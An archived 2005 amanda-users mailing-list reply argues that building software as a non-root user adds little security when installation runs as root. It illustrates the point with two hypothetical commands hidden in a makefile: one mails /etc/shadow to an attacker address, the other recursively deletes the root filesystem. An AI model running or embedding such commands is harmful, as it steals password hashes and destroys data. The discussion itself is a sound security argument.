Amanda-Users
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Fedora Core 3 - which version of tar??

2005-01-21 19:23:18
Subject: Re: Fedora Core 3 - which version of tar??
From: Frank Smith <fsmith AT hoovers DOT com>
To: Eric Siegerman <erics AT telepres DOT com>, amanda-users AT amanda DOT org
Date: Fri, 21 Jan 2005 18:15:28 -0600 

--On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman <erics AT telepres 
DOT com> wrote:

> On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger wrote:
>> - configure and make as $AMANDAUSER
> 
> I don't believe this is necessary.  One should avoid building
> Amanda as root, but that's not because it'll cause problems for
> Amanda; it's for the same reason one should avoid building
> *anything* as root.

Sorry for hijacking a thread, but playing devil's advocate here,
what difference does it really make whether you build as root
or not if you run 'make install' as root?  How many people
actually go through each line of the makefile, or run make -n
first and examine all that, plus look through the code itself?
   In Amanda's case, for example, if the source for runtar
contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
'rm -fR /' would it really make any difference what user it
was compiled under?  Would they notice even if it wasn't buried
in the source, but was just part of the 'install' target in
the makefile (or an included subdirectory makefile)?
   For user programs, compiling and installing as a user
can limit the damage that can be done, but if any part of
the build, install, or execution ever has root privileges
then you really aren't increasing  your security by building
as a normal user and installing as root.
   All that said, I generally do build as a normal user, as
it can expose permission problems on libraries, paths, etc.
at build time instead of later when users are trying to run
the program.

Frank
   
> 
> I've never had a problem building Amanda under my own user
> account, and it's hard to see why such a problem might ever
> occur.
> 
>> make install as root
> 
> This *is* necessary, of course.
> 
> --
> 
>|  | /\
>| -_|/  >   Eric Siegerman, Toronto, Ont.        erics AT telepres DOT com
>|  |  /
> The animal that coils in a circle is the serpent; that's why so
> many cults and myths of the serpent exist, because it's hard to
> represent the return of the sun by the coiling of a hippopotamus.
>       - Umberto Eco, "Foucault's Pendulum"



-- 
Frank Smith                                      fsmith AT hoovers DOT com
Sr. Systems Administrator                       Voice: 512-374-4673
Hoover's Online                                   Fax: 512-374-4501
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Dump level, behaviour change, Eric Siegerman
Next by Date:  Re: Fedora Core 3 - which version of tar??, Jon LaBadie
Previous by Thread:  Re: Fedora Core 3 - which version of tar??, Eric Siegerman
Next by Thread:  Re: Fedora Core 3 - which version of tar??, Jon LaBadie
Indexes:  [Date] [Thread] [Top] [All Lists]